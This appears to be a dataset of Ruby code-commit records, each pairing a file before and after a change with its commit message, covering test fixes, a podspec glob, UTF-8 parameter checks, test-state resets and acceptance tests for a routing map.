  ctx.add_to_changelist(changelist1, path1)
  assert_equal({changelist1=>[path1]}, yield(ctx, changelist1))
  assert_equal({changelist1=>[path1],nil=>[@wc_path,path2]}, yield(ctx, nil))
  assert_equal({}, yield(ctx, []))
  assert_equal({changelist1=>[path1]}, yield(ctx, [changelist1]))
  assert_equal({}, yield(ctx, [changelist2]))
  assert_equal({}, yield(ctx, changelist2))
  # Re-adding to another changelist moves the path (a path belongs to at
  # most one changelist).
  ctx.add_to_changelist(changelist2, [path1, path2])
  assert_equal({changelist2=>[path1, path2]}, yield(ctx, changelist2))
  assert_equal({}, yield(ctx, changelist1))
  ctx.add_to_changelist(changelist1, [path1, path2])
  assert_equal({changelist1=>[path1, path2]}, yield(ctx, changelist1))
  assert_equal({}, yield(ctx, changelist2))
  ctx.remove_from_changelists(changelist1, path1)
  assert_equal({changelist1=>[path2]}, yield(ctx, changelist1))
  ctx.remove_from_changelists(changelist1, [path2])
  assert_equal({}, yield(ctx, changelist1))
  ctx.add_to_changelist(changelist1, path1)
  ctx.add_to_changelist(changelist2, path2)
  assert_equal({changelist1=>[path1]}, yield(ctx, changelist1))
  assert_equal({changelist2=>[path2]}, yield(ctx, changelist2))
  assert_equal({changelist1=>[path1]}, yield(ctx, changelist1))
  assert_equal({changelist2=>[path2]}, yield(ctx, changelist2))
  assert_equal({changelist1=>[path1]}, yield(ctx, [changelist1]))
  assert_equal({changelist2=>[path2]}, yield(ctx, [changelist2]))
  assert_equal({changelist1=>[path1],changelist2=>[path2],nil=>[@wc_path]}, yield(ctx, nil))
  assert_equal({}, yield(ctx, []))
  assert_equal({changelist1=>[path1],changelist2=>[path2]},
               yield(ctx, [changelist1,changelist2]))
  # A nil changelist name removes the paths from whatever list they are in.
  ctx.remove_from_changelists(nil, [path1, path2])
  assert_equal({}, yield(ctx, changelist1))
  assert_equal({}, yield(ctx, changelist2))
end
# Blockless Context#changelists returns the {changelist => paths} hash.
def test_changelists_get_without_block
  assert_changelists do |ctx, changelist_name|
    ctx.changelists(changelist_name, @wc_path)
  end
end
# Block form of Context#changelists yields (path, changelist_name) pairs;
# rebuild the hash to compare with the blockless form.  Hash.new with a
# block gives each key its own fresh array (unlike Hash.new([])).
def test_changelists_get_with_block
  assert_changelists do |ctx, changelist_name|
    changelists = Hash.new{|h,k| h[k]=[]}
    ctx.changelists(changelist_name, @wc_path) do |path,cl_name|
      changelists[cl_name] << path
    end
    changelists
  end
end
end
|
#
# Be sure to run `pod lib lint UYEditor.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
  s.name             = "UYEditor"
  s.version          = "0.3.5"
  s.summary          = "UYEditor"
  s.description      = <<-DESC
                       #UYEditor
                       DESC
  s.homepage         = "https://github.com/youyuedu/UYEditor"
  s.license          = 'MIT'
  s.author           = { "winddpan" => "winddpan@126.com" }
  s.source           = { :git => "https://github.com/youyuedu/UYEditor.git", :tag => s.version.to_s }
  s.platform         = :ios, '7.0'
  s.requires_arc     = true
  s.resources        = 'iOS/HTML/*', 'iOS/UYEditor.xcassets'
  # Recursive glob: 'iOS/Source/*' only matched files directly under
  # iOS/Source and silently dropped sources in nested directories.
  s.source_files     = 'iOS/Source/**/*.{h,m}'
  s.frameworks       = 'UIKit', 'Foundation'
end
Update source_files to a recursive glob ('iOS/Source/**/*.{h,m}') so sources in nested directories are included.
#
# Be sure to run `pod lib lint UYEditor.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
  s.name             = "UYEditor"
  s.version          = "0.3.5"
  s.summary          = "UYEditor"
  s.description      = <<-DESC
                       #UYEditor
                       DESC
  s.homepage         = "https://github.com/youyuedu/UYEditor"
  s.license          = 'MIT'
  s.author           = { "winddpan" => "winddpan@126.com" }
  s.source           = { :git => "https://github.com/youyuedu/UYEditor.git", :tag => s.version.to_s }
  s.platform         = :ios, '7.0'
  s.requires_arc     = true
  s.resources        = 'iOS/HTML/*', 'iOS/UYEditor.xcassets'
  # Recursive glob so headers/implementations in nested directories are included.
  s.source_files     = 'iOS/Source/**/*.{h,m}'
  s.frameworks       = 'UIKit', 'Foundation'
end
|
require 'test_helper'
class SerializedAttributeTest < ActiveSupport::TestCase
  context "A model with a serialized attribute" do
    setup do
      @extract_code = 'Post.limit(1)'
      @extract_name = :posts_with_serialized_thing
    end

    # Extract from the source db, then load into a *separate* freshly
    # recreated schema ('fake_test') before asserting.  The previous version
    # extracted and loaded against the same database, so it never proved the
    # serialized value survives a real extract/load round trip.
    context ".extract and .load_db with serialized attributes" do
      setup do
        FeTestEnv.setup
        Fe.extract(@extract_code, :name => @extract_name)
        FeTestEnv.the_env = 'fake_test'
        FeTestEnv.recreate_schema_without_data
      end
      teardown do
        FeTestEnv.teardown
      end
      should "extract the .dump() value of the serialized attribute" do
        Fe.load_db(@extract_name)
        # Guard against a silently empty load masquerading as success.
        if Post.count == 0
          raise "The test setup didn't work, Post.count should have some rows"
        end
        assert_kind_of ComplexThing, Post.first.serialized_thing
      end
    end
  end
end
Tweaked the test case to be more specific. Previously it both extracted from and loaded into the same database, so it never tested against the freshly loaded db ('fake_test'); that did not reflect how the tool operates in the real world.
require 'test_helper'
class SerializedAttributeTest < ActiveSupport::TestCase
context "A model with a serialized attribute" do
setup do
@extract_code = 'Post.limit(1)'
@extract_name = :posts_with_serialized_thing
end
context ".extract and .load_db with serialized attributes" do
setup do
FeTestEnv.setup
Fe.extract(@extract_code, :name => @extract_name)
FeTestEnv.the_env = 'fake_test'
FeTestEnv.recreate_schema_without_data
end
teardown do
FeTestEnv.teardown
end
should "extract the .dump() value of the serialized attribute" do
Fe.load_db(@extract_name)
if Post.count == 0
raise "The test setup didn't work, Post.count should have some rows"
end
assert_kind_of ComplexThing, Post.first.serialized_thing
end
end
end
end
|
# ruby pre-2.0 compatibility fixes
if RUBY_VERSION < '2.0'
  # see https://bugs.ruby-lang.org/issues/7547
  # the fix was only applied in 2.0
  # Backport of stdlib Dir::Tmpname#create: retries on name collisions up to
  # an optional :max_try, and honors $SAFE taint checks on the tmpdir.
  module Dir::Tmpname
    def create(basename, *rest)
      # Peel a trailing options hash off the argument list, if present.
      if opts = Hash.try_convert(rest[-1])
        opts = opts.dup if rest.pop.equal?(opts)
        max_try = opts.delete(:max_try)
        opts = [opts]
      else
        opts = []
      end
      tmpdir, = *rest
      # Under $SAFE, fall back to /tmp rather than trusting a tainted path.
      if $SAFE > 0 and tmpdir.tainted?
        tmpdir = '/tmp'
      else
        tmpdir ||= tmpdir()
      end
      n = nil
      begin
        path = File.join(tmpdir, make_tmpname(basename, n))
        yield(path, n, *opts)
      rescue Errno::EEXIST
        # Collision: retry with an incremented suffix until max_try.
        n ||= 0
        n += 1
        retry if !max_try or n < max_try
        raise "cannot generate temporary name using `#{basename}' under `#{tmpdir}'"
      end
      path
    end
  end
end
# This makes it so all parameters get converted to UTF-8 before they hit your
# app. If someone sends invalid UTF-8 to your server, raise an exception.
# Distinct error class so invalid bytes arriving in request params can be
# rescued separately from other encoding errors.
class ActionController::InvalidByteSequenceErrorFromParams < Encoding::InvalidByteSequenceError; end
class ActionController::Base
  # Walks every leaf of the params structure (and uploaded files' original
  # filenames, and the request path), tags each string as UTF-8, and raises
  # if the resulting bytes are not valid UTF-8.
  def force_utf8_params
    # Depth-first traversal over nested hashes/arrays, applying `block` to
    # each leaf value.
    traverse = lambda do |object, block|
      if object.kind_of?(Hash)
        object.each_value { |o| traverse.call(o, block) }
      elsif object.kind_of?(Array)
        object.each { |o| traverse.call(o, block) }
      else
        block.call(object)
      end
      object
    end
    force_encoding = lambda do |o|
      if o.respond_to?(:force_encoding)
        o.force_encoding(Encoding::UTF_8)
        raise ActionController::InvalidByteSequenceErrorFromParams unless o.valid_encoding?
      end
      # Uploaded files: validate the client-supplied filename too.
      if o.respond_to?(:original_filename) && o.original_filename
        o.original_filename.force_encoding(Encoding::UTF_8)
        raise ActionController::InvalidByteSequenceErrorFromParams unless o.original_filename.valid_encoding?
      end
    end
    traverse.call(params, force_encoding)
    path_str = request.path.to_s
    if path_str.respond_to?(:force_encoding)
      path_str.force_encoding(Encoding::UTF_8)
      raise ActionController::InvalidByteSequenceErrorFromParams unless path_str.valid_encoding?
    end
  end
  before_filter :force_utf8_params
end
# Fix for https://bugs.ruby-lang.org/issues/7278 , which was filling up our logs with these warnings
if RUBY_VERSION < "2."
  require 'net/protocol'
  class Net::InternetMessageIO
    # Patched each_crlf_line: normalizes any line ending to CRLF while
    # buffering, without the regexp that triggered the warnings upstream.
    def each_crlf_line(src)
      buffer_filling(@wbuf, src) do
        while line = @wbuf.slice!(/\A[^\r\n]*(?:\n|\r(?:\n|(?!\z)))/)
          yield line.chomp("\n") + "\r\n"
        end
      end
    end
  end
end
Alias Utf8SafeYAMLColumn to YAMLColumn so existing references keep working for unmarshalling.
Change-Id: I3aeea850b7d39fd476e887ea3f4dbf90d143ce58
Reviewed-on: https://gerrit.instructure.com/77844
Reviewed-by: Cody Cutrer <c4fe2b1d90ef8f2548c8aeabfa633434316f0305@instructure.com>
Tested-by: Jenkins
Product-Review: James Williams <3a5f4ed991dbfa5c9ef76ad729d240ca12f62180@instructure.com>
QA-Review: James Williams <3a5f4ed991dbfa5c9ef76ad729d240ca12f62180@instructure.com>
# ruby pre-2.0 compatibility fixes
if RUBY_VERSION < '2.0'
  # see https://bugs.ruby-lang.org/issues/7547
  # the fix was only applied in 2.0
  # Backport of stdlib Dir::Tmpname#create: retries on name collisions up to
  # an optional :max_try, and honors $SAFE taint checks on the tmpdir.
  module Dir::Tmpname
    def create(basename, *rest)
      # Peel a trailing options hash off the argument list, if present.
      if opts = Hash.try_convert(rest[-1])
        opts = opts.dup if rest.pop.equal?(opts)
        max_try = opts.delete(:max_try)
        opts = [opts]
      else
        opts = []
      end
      tmpdir, = *rest
      # Under $SAFE, fall back to /tmp rather than trusting a tainted path.
      if $SAFE > 0 and tmpdir.tainted?
        tmpdir = '/tmp'
      else
        tmpdir ||= tmpdir()
      end
      n = nil
      begin
        path = File.join(tmpdir, make_tmpname(basename, n))
        yield(path, n, *opts)
      rescue Errno::EEXIST
        # Collision: retry with an incremented suffix until max_try.
        n ||= 0
        n += 1
        retry if !max_try or n < max_try
        raise "cannot generate temporary name using `#{basename}' under `#{tmpdir}'"
      end
      path
    end
  end
end
# This makes it so all parameters get converted to UTF-8 before they hit your
# app. If someone sends invalid UTF-8 to your server, raise an exception.
# Distinct error class so invalid bytes arriving in request params can be
# rescued separately from other encoding errors.
class ActionController::InvalidByteSequenceErrorFromParams < Encoding::InvalidByteSequenceError; end
class ActionController::Base
  # Walks every leaf of the params structure (and uploaded files' original
  # filenames, and the request path), tags each string as UTF-8, and raises
  # if the resulting bytes are not valid UTF-8.
  def force_utf8_params
    # Depth-first traversal over nested hashes/arrays, applying `block` to
    # each leaf value.
    traverse = lambda do |object, block|
      if object.kind_of?(Hash)
        object.each_value { |o| traverse.call(o, block) }
      elsif object.kind_of?(Array)
        object.each { |o| traverse.call(o, block) }
      else
        block.call(object)
      end
      object
    end
    force_encoding = lambda do |o|
      if o.respond_to?(:force_encoding)
        o.force_encoding(Encoding::UTF_8)
        raise ActionController::InvalidByteSequenceErrorFromParams unless o.valid_encoding?
      end
      # Uploaded files: validate the client-supplied filename too.
      if o.respond_to?(:original_filename) && o.original_filename
        o.original_filename.force_encoding(Encoding::UTF_8)
        raise ActionController::InvalidByteSequenceErrorFromParams unless o.original_filename.valid_encoding?
      end
    end
    traverse.call(params, force_encoding)
    path_str = request.path.to_s
    if path_str.respond_to?(:force_encoding)
      path_str.force_encoding(Encoding::UTF_8)
      raise ActionController::InvalidByteSequenceErrorFromParams unless path_str.valid_encoding?
    end
  end
  before_filter :force_utf8_params
end
# Backward-compat alias: code referring to Utf8SafeYAMLColumn keeps working
# now that plain YAMLColumn handles unmarshalling.
module ActiveRecord::Coders
  Utf8SafeYAMLColumn = YAMLColumn
end
# Fix for https://bugs.ruby-lang.org/issues/7278 , which was filling up our logs with these warnings
if RUBY_VERSION < "2."
  require 'net/protocol'
  class Net::InternetMessageIO
    # Patched each_crlf_line: normalizes any line ending to CRLF while
    # buffering, without the regexp that triggered the warnings upstream.
    def each_crlf_line(src)
      buffer_filling(@wbuf, src) do
        while line = @wbuf.slice!(/\A[^\r\n]*(?:\n|\r(?:\n|(?!\z)))/)
          yield line.chomp("\n") + "\r\n"
        end
      end
    end
  end
end
|
module ServiceListeners
  # Enqueues a background job that propagates an attachment's replacement ID,
  # but only when the attachment data has actually been replaced.
  #
  # Fix: removed the unused `include Rails.application.routes.url_helpers`
  # and `include PublicDocumentRoutesHelper` — no method from either helper
  # is referenced anywhere in this class.
  class AttachmentReplacementIdUpdater
    attr_reader :attachment_data, :queue

    # queue: optional Sidekiq queue name; when given, the job is enqueued
    # on that queue instead of the worker's default.
    def initialize(attachment_data, queue: nil)
      @attachment_data = attachment_data
      @queue = queue
    end

    # No-op unless there is attachment data with a replacement.
    def update!
      return unless attachment_data.present?
      return unless attachment_data.replaced_by.present?
      worker.perform_async(attachment_data.id)
    end

    private

    def worker
      worker = AssetManagerAttachmentReplacementIdUpdateWorker
      queue.present? ? worker.set(queue: queue) : worker
    end
  end
end
Remove unused includes in AttachmentReplacementIdUpdater
Methods from these helpers are not used in this class.
module ServiceListeners
  # Enqueues a background job that propagates an attachment's replacement ID,
  # but only when the attachment data has actually been replaced.
  class AttachmentReplacementIdUpdater
    attr_reader :attachment_data, :queue

    # queue: optional Sidekiq queue name overriding the worker's default.
    def initialize(attachment_data, queue: nil)
      @attachment_data = attachment_data
      @queue = queue
    end

    # Schedules the async update; no-op when there is no attachment data or
    # it has never been replaced.
    def update!
      return if attachment_data.blank?
      return if attachment_data.replaced_by.blank?
      worker.perform_async(attachment_data.id)
    end

    private

    # The worker class, bound to the requested queue when one was given.
    def worker
      base = AssetManagerAttachmentReplacementIdUpdateWorker
      if queue.present?
        base.set(queue: queue)
      else
        base
      end
    end
  end
end
|
class TestYaoResouce < Test::Unit::TestCase
  include AuthStub

  def setup
    initialize_test_client!
  end

  # Fix: without a teardown, the Yao.default_client configured in setup
  # leaked into every test run after this one; reset it so other test cases
  # see no side effects.
  def teardown
    reset_test_client!
  end

  private

  # Helper so Yao::Resources::* tests do not have to configure
  # Yao.default.pool individually; all endpoints are unified on example.com
  # to keep test stubbing simple.
  def initialize_test_client!
    auth_url = "http://example.com:12345"
    username = "yao"
    tenant   = "default"
    password = "password"

    stub_auth_request(auth_url, username, password, tenant)

    Yao.config.set :auth_url, auth_url
    Yao::Auth.new(tenant_name: tenant, username: username, password: password)

    # NOTE(review): the auth URL above is http while this client URL is
    # https — confirm the scheme mismatch is intentional.
    client = Yao::Client.gen_client("https://example.com:12345")
    Yao.default_client.admin_pool["identity"] = client
    Yao.default_client.pool["network"]  = client
    Yao.default_client.pool["compute"]  = client
    Yao.default_client.pool["metering"] = client
  end

  # Reset the shared default client so state does not leak across test cases.
  def reset_test_client!
    Yao::Client.default_client = nil
  end
end
TestYaoResouce#teardown で Yao.default_client をリセットして、他のテストに副作用を出さないようにする
# Shared base for Yao::Resources::* tests: wires up a stubbed client in setup
# and resets the global client in teardown so state cannot leak between tests.
class TestYaoResouce < Test::Unit::TestCase
  include AuthStub

  def setup
    initialize_test_client!
  end

  def teardown
    reset_test_client!
  end

  private

  # Helper so that Yao::Resources::* tests don't have to set up
  # Yao.default.pool every single time. Endpoint URLs are unified on
  # example.com because varying endpoints make the tests tedious to write.
  def initialize_test_client!
    auth_url = "http://example.com:12345"
    username = "yao"
    tenant = "default"
    password = "password"
    stub_auth_request(auth_url, username, password, tenant)
    Yao.config.set :auth_url, auth_url
    Yao::Auth.new(tenant_name: tenant, username: username, password: password)
    client = Yao::Client.gen_client("https://example.com:12345")
    Yao.default_client.admin_pool["identity"] = client
    Yao.default_client.pool["network"] = client
    Yao.default_client.pool["compute"] = client
    Yao.default_client.pool["metering"] = client
  end

  # Reset Yao::Client.default_client to nil so no side effects bleed into
  # other tests.
  def reset_test_client!
    Yao::Client.default_client = nil
  end
end
|
# Shared base for Yao::Resources::* tests: wires up a stubbed client in setup
# and resets the global client and config in teardown so state cannot leak
# between tests.
class TestYaoResouce < Test::Unit::TestCase
  include AuthStub

  def setup
    initialize_test_client!
  end

  def teardown
    reset_test_client!
  end

  private

  # Helper so that Yao::Resources::* tests don't have to set up
  # Yao.default.pool every single time. Endpoint URLs are unified on
  # example.com because varying endpoints make the tests tedious to write.
  def initialize_test_client!
    auth_url = "http://example.com:12345"
    username = "yao"
    tenant = "default"
    password = "password"
    stub_auth_request(auth_url, username, password, tenant)
    Yao.config.set :auth_url, auth_url
    Yao::Auth.new(tenant_name: tenant, username: username, password: password)
    client = Yao::Client.gen_client("https://example.com:12345")
    Yao.default_client.admin_pool["identity"] = client
    Yao.default_client.pool["network"] = client
    Yao.default_client.pool["compute"] = client
    Yao.default_client.pool["metering"] = client
  end

  # Reset Yao::Client.default_client and the Yao::Config keys to nil so no
  # side effects bleed into other tests.
  def reset_test_client!
    Yao::Client.default_client = nil
    Yao::Config::HOOK_RENEW_CLIENT_KEYS.each do |key|
      Yao.configure do
        set key, nil
      end
    end
  end
end
Yao::Resources::* のテストで stub_request を使うと状態を持ってしまい、別のテストに副作用を出す
各テストの teardown で WebMock.reset! して防ぐ
# Shared base for Yao::Resources::* tests: wires up a stubbed client in setup
# and, in teardown, resets the global client, config, and WebMock stubs so
# state cannot leak between tests.
class TestYaoResouce < Test::Unit::TestCase
  include AuthStub

  def setup
    initialize_test_client!
  end

  def teardown
    reset_test_client!
  end

  private

  # Helper so that Yao::Resources::* tests don't have to set up
  # Yao.default.pool every single time. Endpoint URLs are unified on
  # example.com because varying endpoints make the tests tedious to write.
  def initialize_test_client!
    auth_url = "http://example.com:12345"
    username = "yao"
    tenant = "default"
    password = "password"
    stub_auth_request(auth_url, username, password, tenant)
    Yao.config.set :auth_url, auth_url
    Yao::Auth.new(tenant_name: tenant, username: username, password: password)
    client = Yao::Client.gen_client("https://example.com:12345")
    Yao.default_client.admin_pool["identity"] = client
    Yao.default_client.pool["network"] = client
    Yao.default_client.pool["compute"] = client
    Yao.default_client.pool["metering"] = client
  end

  # Reset Yao::Client.default_client and the Yao::Config keys to nil so no
  # side effects bleed into other tests.
  def reset_test_client!
    Yao::Client.default_client = nil
    Yao::Config::HOOK_RENEW_CLIENT_KEYS.each do |key|
      Yao.configure do
        set key, nil
      end
    end
    # https://github.com/bblimke/webmock/wiki/Clear-stubs-and-request-history
    # stub_request registrations are stateful; reset them so they cannot
    # affect other tests.
    WebMock.reset!
  end
end
|
require 'rails_helper'

# Acceptance tests for the routing sidebar: opening the form, calculating a
# route between two coordinate pairs, and swapping origin/destination.
describe "Route", type: :feature do
  it "should show the route form when you click the route button", js: true do
    visit root_path
    # The route button has no Capybara-friendly handle, so trigger its
    # jQuery click directly.
    page.evaluate_script("$('.ion-merge').click()")
    expect(page).to have_content('Trajetos')
  end

  it "should calculate the route", js: true do
    # External routing calls can error server-side; don't fail the spec on that.
    Capybara.raise_server_errors = false
    visit root_path
    page.evaluate_script("$('.ion-merge').click()")
    within("#sidebar form") do
      fill_in 'route[origin]', with: '-15.76528581775335, -47.866482138633735'
      fill_in 'route[destination]', with: '-15.766824273744168, -47.867302894592285'
    end
    click_button 'Obter Trajeto'
    expect(page).to have_content('You have arrived at your destination.')
  end

  it "should swap locations of the route", js: true do
    visit root_path
    page.evaluate_script("$('.ion-merge').click()")
    origin = '-15.76528581775335, -47.866482138633735'
    destination = '-15.766824273744168, -47.867302894592285'
    within("#sidebar form") do
      fill_in 'route[origin]', with: origin
      fill_in 'route[destination]', with: destination
      find('.btn-reverse-route').click
    end
    # After the swap button, the two fields must have traded values.
    expect(page).to have_field('route[origin]', with: destination)
    expect(page).to have_field('route[destination]', with: origin)
  end
end
Adding acceptance tests, to test route modes.
require 'rails_helper'

# Acceptance tests for the routing sidebar: opening the form, swapping
# origin/destination, and calculating routes in each travel mode.
describe "Route", type: :feature do
  it "should show the route form when you click the route button", js: true do
    visit root_path
    # The route button has no Capybara-friendly handle, so trigger its
    # jQuery click directly.
    page.evaluate_script("$('.ion-merge').click()")
    expect(page).to have_content('Trajetos')
  end

  it "should swap locations of the route", js: true do
    visit root_path
    page.evaluate_script("$('.ion-merge').click()")
    origin = '-15.76528581775335, -47.866482138633735'
    destination = '-15.766824273744168, -47.867302894592285'
    within("#sidebar form") do
      fill_in 'route[origin]', with: origin
      fill_in 'route[destination]', with: destination
      find('.btn-reverse-route').click
    end
    # After the swap button, the two fields must have traded values.
    expect(page).to have_field('route[origin]', with: destination)
    expect(page).to have_field('route[destination]', with: origin)
  end

  context "Calculate the route" do
    before(:each) do
      # External routing calls can error server-side; don't fail specs on that.
      Capybara.raise_server_errors = false
      visit root_path
      page.evaluate_script("$('.ion-merge').click()")
      within("#sidebar form") do
        fill_in 'route[origin]', with: '-15.76528581775335, -47.866482138633735'
        fill_in 'route[destination]', with: '-15.766824273744168, -47.867302894592285'
      end
    end

    # The three mode buttons are unlabeled radio-style toggles; they are
    # selected by position (0 = pedestrian, 1 = bicycle, 2 = car).
    it "should calculate the route for pedestrian", js: true do
      within("#sidebar form") do
        page.all('label.btn.btn-outline-info')[0].click
        click_button 'Obter Trajeto'
      end
      expect(find('#mode_text')).to have_content('A pé')
      expect(page).to have_content('You have arrived at your destination.')
    end

    it "should calculate the route for bicycle", js: true do
      within("#sidebar form") do
        page.all('label.btn.btn-outline-info')[1].click
        click_button 'Obter Trajeto'
      end
      expect(find('#mode_text')).to have_content('Bicicleta')
      expect(page).to have_content('You have arrived at your destination.')
    end

    it "should calculate the route for car", js: true do
      within("#sidebar form") do
        page.all('label.btn.btn-outline-info')[2].click
        click_button 'Obter Trajeto'
      end
      expect(find('#mode_text')).to have_content('Carro')
      expect(page).to have_content('You have arrived at your destination.')
    end
  end

  context "Context Menu" do
    # NOTE(review): this test is work-in-progress — it currently makes no
    # expectations (the assertion is commented out below), so it can never
    # fail. Either finish it or mark it pending/skipped.
    it "should show context menu when right click the map", js: true do
      visit root_path
      tiles_origin = page.evaluate_script('$(".leaflet-tile").eq(3).trigger("contextmenu")')
      tiles_destination = page.evaluate_script('$(".leaflet-tile").eq(4)')
      #puts tiles_origin
      #puts tiles_destination
      #page.evaluate_script('$("#map").trigger("contextmenu")')
      ##puts page.evaluate_script('$(".leaflet-contextmenu").html()')
      #expect(page).to have_content('Rotas a partir daqui')
      page.save_screenshot
    end
  end
end
|
Remove period
|
require_relative "test_helper"
require 'timecop'

# Exercises Timecop's freeze/travel behaviour in an environment where the
# Date and DateTime constants have been removed (Timecop must not depend on
# them being defined).
class TestTimecopWithoutDate < Minitest::Test
  def setup
    Object.send(:remove_const, :Date) if Object.const_defined?(:Date)
    Object.send(:remove_const, :DateTime) if Object.const_defined?(:DateTime)
  end

  # just in case...let's really make sure that Timecop is disabled between tests...
  def teardown
    Timecop.return
  end

  def test_freeze_changes_and_resets_time
    # depending on how we're invoked (individually or via the rake test suite)
    assert !Time.respond_to?(:zone) || Time.zone.nil?
    t = Time.local(2008, 10, 10, 10, 10, 10)
    assert t != Time.now
    Timecop.freeze(2008, 10, 10, 10, 10, 10) do
      assert_equal t, Time.now
    end
    assert t != Time.now
  end

  def test_recursive_freeze
    t = Time.local(2008, 10, 10, 10, 10, 10)
    Timecop.freeze(2008, 10, 10, 10, 10, 10) do
      assert_equal t, Time.now
      t2 = Time.local(2008, 9, 9, 9, 9, 9)
      Timecop.freeze(2008, 9, 9, 9, 9, 9) do
        assert_equal t2, Time.now
      end
      # leaving the inner block must restore the outer frozen time
      assert_equal t, Time.now
    end
    assert_nil Time.send(:mock_time)
  end

  def test_exception_thrown_in_freeze_block_properly_resets_time
    t = Time.local(2008, 10, 10, 10, 10, 10)
    begin
      Timecop.freeze(t) do
        assert_equal t, Time.now
        raise "blah exception"
      end
    rescue
      # even after an exception, the mock time must have been unwound
      assert t != Time.now
      assert_nil Time.send(:mock_time)
    end
  end

  def test_freeze_freezes_time
    t = Time.local(2008, 10, 10, 10, 10, 10)
    now = Time.now
    Timecop.freeze(t) do
      sleep(0.25)
      assert Time.now < now, "If we had failed to freeze, time would have proceeded, which is what appears to have happened."
      new_t = Time.now
      assert_equal t, new_t, "Failed to change move time." # 2 seconds
      assert_equal new_t, Time.now
    end
  end

  def test_travel_keeps_time_moving
    t = Time.local(2008, 10, 10, 10, 10, 10)
    now = Time.now
    Timecop.travel(t) do
      new_now = Time.now
      assert_times_effectively_equal new_now, t, 1, "Looks like we failed to actually travel time" # 0.1 seconds
      sleep(0.25)
      # Threshold is 0.24 rather than 0.25: sleep(0.25) is only guaranteed to
      # sleep *about* that long, and on some runtimes (notably JRuby) the
      # measured delta can land at or fractionally under 0.25, making a
      # strict 0.25 threshold fail intermittently.
      assert_times_effectively_not_equal new_now, Time.now, 0.24, "Looks like time is not moving"
    end
  end

  def test_recursive_travel_maintains_each_context
    t = Time.local(2008, 10, 10, 10, 10, 10)
    Timecop.travel(2008, 10, 10, 10, 10, 10) do
      assert((t - Time.now).abs < 50, "Failed to travel time.")
      t2 = Time.local(2008, 9, 9, 9, 9, 9)
      Timecop.travel(2008, 9, 9, 9, 9, 9) do
        assert_times_effectively_equal(t2, Time.now, 1, "Failed to travel time.")
        assert_times_effectively_not_equal(t, Time.now, 1000, "Failed to travel time.")
      end
      assert_times_effectively_equal(t, Time.now, 2, "Failed to restore previously-traveled time.")
    end
    assert_nil Time.send(:mock_time)
  end

  def test_recursive_travel_then_freeze
    t = Time.local(2008, 10, 10, 10, 10, 10)
    Timecop.travel(2008, 10, 10, 10, 10, 10) do
      assert((t - Time.now).abs < 50, "Failed to travel time.")
      t2 = Time.local(2008, 9, 9, 9, 9, 9)
      Timecop.freeze(2008, 9, 9, 9, 9, 9) do
        assert_equal t2, Time.now
      end
      assert_times_effectively_equal(t, Time.now, 2, "Failed to restore previously-traveled time.")
    end
    assert_nil Time.send(:mock_time)
  end

  def test_recursive_freeze_then_travel
    t = Time.local(2008, 10, 10, 10, 10, 10)
    Timecop.freeze(t) do
      assert_equal t, Time.now
      t2 = Time.local(2008, 9, 9, 9, 9, 9)
      Timecop.travel(t2) do
        assert_times_effectively_equal(t2, Time.now, 1, "Failed to travel time.")
        assert_times_effectively_not_equal(t, Time.now, 1000, "Failed to travel time.")
      end
      assert_equal t, Time.now
    end
    assert_nil Time.send(:mock_time)
  end
end
Fixed a test that was intermittently failing on JRuby.
require_relative "test_helper"
require 'timecop'

# Exercises Timecop's freeze/travel behaviour in an environment where the
# Date and DateTime constants have been removed (Timecop must not depend on
# them being defined).
class TestTimecopWithoutDate < Minitest::Test
  def setup
    Object.send(:remove_const, :Date) if Object.const_defined?(:Date)
    Object.send(:remove_const, :DateTime) if Object.const_defined?(:DateTime)
  end

  # just in case...let's really make sure that Timecop is disabled between tests...
  def teardown
    Timecop.return
  end

  def test_freeze_changes_and_resets_time
    # depending on how we're invoked (individually or via the rake test suite)
    assert !Time.respond_to?(:zone) || Time.zone.nil?
    t = Time.local(2008, 10, 10, 10, 10, 10)
    assert t != Time.now
    Timecop.freeze(2008, 10, 10, 10, 10, 10) do
      assert_equal t, Time.now
    end
    assert t != Time.now
  end

  def test_recursive_freeze
    t = Time.local(2008, 10, 10, 10, 10, 10)
    Timecop.freeze(2008, 10, 10, 10, 10, 10) do
      assert_equal t, Time.now
      t2 = Time.local(2008, 9, 9, 9, 9, 9)
      Timecop.freeze(2008, 9, 9, 9, 9, 9) do
        assert_equal t2, Time.now
      end
      # leaving the inner block must restore the outer frozen time
      assert_equal t, Time.now
    end
    assert_nil Time.send(:mock_time)
  end

  def test_exception_thrown_in_freeze_block_properly_resets_time
    t = Time.local(2008, 10, 10, 10, 10, 10)
    begin
      Timecop.freeze(t) do
        assert_equal t, Time.now
        raise "blah exception"
      end
    rescue
      # even after an exception, the mock time must have been unwound
      assert t != Time.now
      assert_nil Time.send(:mock_time)
    end
  end

  def test_freeze_freezes_time
    t = Time.local(2008, 10, 10, 10, 10, 10)
    now = Time.now
    Timecop.freeze(t) do
      sleep(0.25)
      assert Time.now < now, "If we had failed to freeze, time would have proceeded, which is what appears to have happened."
      new_t = Time.now
      assert_equal t, new_t, "Failed to change move time." # 2 seconds
      assert_equal new_t, Time.now
    end
  end

  def test_travel_keeps_time_moving
    t = Time.local(2008, 10, 10, 10, 10, 10)
    now = Time.now
    Timecop.travel(t) do
      new_now = Time.now
      assert_times_effectively_equal new_now, t, 1, "Looks like we failed to actually travel time" # 0.1 seconds
      sleep(0.25)
      # 0.24 (not 0.25) to tolerate sleep() returning fractionally early on
      # some runtimes (e.g. JRuby), which made this intermittently fail.
      assert_times_effectively_not_equal new_now, Time.now, 0.24, "Looks like time is not moving"
    end
  end

  def test_recursive_travel_maintains_each_context
    t = Time.local(2008, 10, 10, 10, 10, 10)
    Timecop.travel(2008, 10, 10, 10, 10, 10) do
      assert((t - Time.now).abs < 50, "Failed to travel time.")
      t2 = Time.local(2008, 9, 9, 9, 9, 9)
      Timecop.travel(2008, 9, 9, 9, 9, 9) do
        assert_times_effectively_equal(t2, Time.now, 1, "Failed to travel time.")
        assert_times_effectively_not_equal(t, Time.now, 1000, "Failed to travel time.")
      end
      assert_times_effectively_equal(t, Time.now, 2, "Failed to restore previously-traveled time.")
    end
    assert_nil Time.send(:mock_time)
  end

  def test_recursive_travel_then_freeze
    t = Time.local(2008, 10, 10, 10, 10, 10)
